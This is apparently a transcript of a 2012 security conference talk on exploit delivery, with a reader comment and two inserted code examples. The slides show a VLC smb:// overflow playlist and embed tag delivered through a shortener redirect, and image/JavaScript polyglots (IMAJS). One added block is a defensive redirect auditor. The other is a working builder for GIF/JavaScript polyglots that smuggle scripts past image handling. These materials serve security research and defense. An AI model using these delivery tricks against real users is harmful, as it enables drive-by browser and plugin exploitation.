Innovative Exploit Delivery

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

Comment:
  • Yeah, but can you exploit it on latest Linux amd64 with all the new gcc patches, PIE, stack cookies, ASLR, heap protection, etc? No...
Innovative Exploit Delivery

1. INNOVATIVE EXPLOIT DELIVERY
   Saumil Shah, net-square. HITB2012KUL.

2. # who am i
   Saumil Shah, CEO Net-Square.
   • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.
   • M.S. Computer Science, Purdue University.
   • saumil@net-square.com
   • LinkedIn: saumilshah
   • Twitter: @therealsaumil

3. My area of work
   Penetration Testing, Reverse Engineering, Exploit Writing, New Attack Research, Offensive Security, Defense, Conference Speaker, "Eyes and ears open".

4. When two forces combine...
   Web Hacking + Binary Exploits

5. SNEAKY. LETHAL.

6. [image-only slide]

7. 302 / IMG / JS / HTML5

8. [image-only slide]

9. VLC smb overflow
   • smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}
   • Classic Stack Overflow.

10. VLC XSPF file
    <?xml version="1.0" encoding="UTF-8"?>
    <playlist version="1" xmlns="http://xspf.org/ns/0/"
              xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
      <title>Playlist</title>
      <trackList>
        <track>
          <location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
          <extension application="http://www.videolan.org/vlc/playlist/0">
            <vlc:id>0</vlc:id>
          </extension>
        </track>
      </trackList>
    </playlist>

11. Alpha Encoded Exploit + Tiny URL = ZOMFG

12. 100% Pure Alphanum!

13. VLC smb overflow - HTMLized!!
    <embed type="application/x-vlc-plugin"
           width="320" height="200"
           target="http://tinyurl.com/ycctrzf"
           id="vlc" />

14. 301 Redirect from tinyurl
    HTTP/1.1 301 Moved Permanently
    X-Powered-By: PHP/5.2.12
    Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?…}
    Content-type: text/html
    Content-Length: 0
    Connection: close
    Server: TinyURL/1.6
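The redirect on slide 14 is the delivery step: the VLC plugin is pointed at a shortener, the shortener answers 301, and the Location is an smb:// URL whose fragment carries the overflow string. The following is an added example, not part of the talk, showing the check a plugin or forward proxy should have made before following that redirect. It parses a raw HTTP response, reads the Location header and reports a non-HTTP scheme, user info in front of the host, and an oversized fragment. The response text is constructed after slide 14 with a run of A's standing in for the payload; the maxFragment threshold is an arbitrary choice made here.

```javascript
// Added example (not part of the talk): audit an HTTP redirect response for
// the delivery trick on slide 14. The response below is constructed after the
// tinyurl reply shown there; the A-run stands in for the real payload.
const SAMPLE_RESPONSE = [
  'HTTP/1.1 301 Moved Permanently',
  'X-Powered-By: PHP/5.2.12',
  'Location:smb://example.com@0.0.0.0/foo/#{' + 'A'.repeat(400) + '}',
  'Content-type: text/html',
  'Content-Length: 0',
  'Connection: close',
  'Server: TinyURL/1.6',
  '',
  '',
].join('\r\n');

// Minimal HTTP/1.x response parser: status code plus a lower-cased header map.
function parseResponse(raw) {
  const head = raw.split('\r\n\r\n')[0];
  const [statusLine, ...headerLines] = head.split('\r\n');
  const status = Number(statusLine.split(' ')[1]);
  const headers = {};
  for (const line of headerLines) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { status, headers };
}

// Returns { redirect, target, findings }. findings is empty for a plain
// http(s) redirect and lists each property a plugin or proxy should refuse.
// maxFragment is an arbitrary threshold chosen for this example.
function auditRedirect(raw, { maxFragment = 256 } = {}) {
  const { status, headers } = parseResponse(raw);
  const findings = [];
  if (status < 300 || status > 399 || !headers.location) {
    return { redirect: false, target: null, findings };
  }
  let url;
  try {
    url = new URL(headers.location);
  } catch (e) {
    return { redirect: true, target: headers.location, findings: ['unparseable Location'] };
  }
  // Following a 3xx into smb://, file:// or any other non-HTTP scheme hands the
  // URL to a different protocol handler, which is exactly what the slide relies on.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    findings.push('non-HTTP scheme ' + url.protocol);
  }
  if (url.username || url.password) {
    findings.push('userinfo in Location (' + url.username + '@' + url.hostname + ')');
  }
  const fragmentLength = url.hash ? url.hash.length - 1 : 0;
  if (fragmentLength > maxFragment) {
    findings.push('fragment of ' + fragmentLength + ' bytes');
  }
  return { redirect: true, target: url.href, findings };
}
```

Running `auditRedirect(SAMPLE_RESPONSE)` yields three findings: the smb: scheme, the `example.com@0.0.0.0` user info, and a 402-byte fragment. The fragment is the part that never reaches an HTTP server, so a content filter that only looks at request paths never sees the payload; the place to catch it is the redirect target.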
15. [image-only slide]

16. Exploits as Images - 1
    • Grayscale encoding (0-255).
    • 1 pixel = 1 character.
    • Perfectly valid image.
    • Decode and Execute!

17. [image-only slide]

18. I'm an evil Javascript / I'm an innocent image

19. <CANVAS>

20. c) no eval()

21. Same Same No Different!
    var a = eval(str);
    a = (new Function(str))();

22. d) IMAJS

23. IMAJS - Seeing is Believing

24. Browser Support for IMAJS-GIF
    Height  Width   Browser/Viewer    Image renders?   Javascript executes?
    2f 2a   00 00   Firefox           yes              yes
    2f 2a   00 00   Safari            yes              yes
    2f 2a   00 00   IE                no               yes
    2f 2a   00 00   Chrome            yes              yes
    2f 2a   00 00   Preview.app       yes              -
    2f 2a   00 00   XP Image Viewer   no               -
    2f 2a   00 00   Win 7 Preview     yes              -

25. Browser Support for IMAJS-BMP
    Height  Width   Browser/Viewer    Image renders?   Javascript executes?
    2f 2a   00 00   Firefox           yes              yes
    2f 2a   00 00   Safari            yes              yes
    2f 2a   00 00   IE                yes              yes
    2f 2a   00 00   Chrome            yes              yes
    2f 2a   00 00   Opera             yes              yes
    2f 2a   00 00   Preview.app       yes              -
    2f 2a   00 00   XP Image Viewer   yes              -
    2f 2a   00 00   Win 7 Preview     yes              -
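The tables on slides 24 and 25 give away how IMAJS works: the bytes 2f 2a 00 00 sit in the size fields right after the file magic, and the same file is handed once to an image decoder and once to a JavaScript parser. The block below is an added example, not the slides' own generator, that builds the GIF flavour. "GIF89a" is followed by the logical screen width and height as little-endian 16-bit fields; width 0x2a2f and height 0 make the file start with the text `GIF89a/*`, so to JavaScript it is the identifier `GIF89a` followed by a block comment that swallows the binary image. After the GIF trailer (0x3b), where every image decoder stops, the comment is closed and the payload follows. The 1x1 image and the payload string are constructed here.

```javascript
// Added example, not the slides' own generator: a GIF/JavaScript polyglot of
// the IMAJS kind, built from the 2f 2a 00 00 bytes shown on slides 24 and 25.
function buildImajsGif(jsPayload) {
  const header = Buffer.from([
    0x47, 0x49, 0x46, 0x38, 0x39, 0x61, // "GIF89a"
    0x2f, 0x2a,                         // logical screen width 0x2a2f -> "/*"
    0x00, 0x00,                         // logical screen height 0
    0x80, 0x00, 0x00,                   // global colour table present, 2 entries; bg index; aspect
    0x00, 0x00, 0x00, 0xff, 0xff, 0xff, // colour table: black, white
  ]);
  const image = Buffer.from([
    0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, // image descriptor: 1x1 at (0,0)
    0x02, 0x02, 0x44, 0x01, 0x00,                               // LZW data: clear, pixel 0, end
    0x3b,                                                       // trailer: image decoders stop here
  ]);
  // Close the comment, turn the dangling identifier into a harmless assignment
  // ("GIF89a=1;"), then let the payload run. Constructed payload, Latin-1 only.
  const tail = Buffer.from('*/=1;' + jsPayload, 'latin1');
  const gif = Buffer.concat([header, image, tail]);
  // The binary part must not contain "*/", or the comment would end early.
  if (gif.indexOf('*/', 0, 'latin1') !== header.length + image.length) {
    throw new Error('image bytes close the comment early');
  }
  return gif;
}

// Read the logical screen size back the way an image decoder does.
function gifScreen(buf) {
  if (buf.toString('ascii', 0, 6) !== 'GIF89a') throw new Error('not a GIF89a file');
  return { width: buf.readUInt16LE(6), height: buf.readUInt16LE(8) };
}

// What <script src="poly.gif"> did in the browsers listed in the table:
// evaluate the same bytes as JavaScript. new Function instead of eval, as on slide 21.
function runAsScript(buf) {
  return new Function(buf.toString('latin1'))();
}
```

`gifScreen` reports a 10799x0 logical screen, which is why the table entry for IE reads "image: no, Javascript: yes": the two parsers are independent, and the trick only needs the script parser to be forgiving. Two caveats for anyone testing this today: a browser given `X-Content-Type-Options: nosniff` refuses to run a script whose response carries an image MIME type, and current browsers block image-typed script responses outright; the yes/no columns describe the 2012 browsers on the slide.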
26. e) The αq exploit

27. Encode using Alpha channel

28. Demo: IMAJS αq FTW!
29. f) ONE LAST DEMO!!!

30. The FUTURE?
    HTML5 Video, SVG, WebGL, Mobile Browsers

31. KTHXBAI. See you in 2013??
    saumil@net-square.com | @therealsaumil
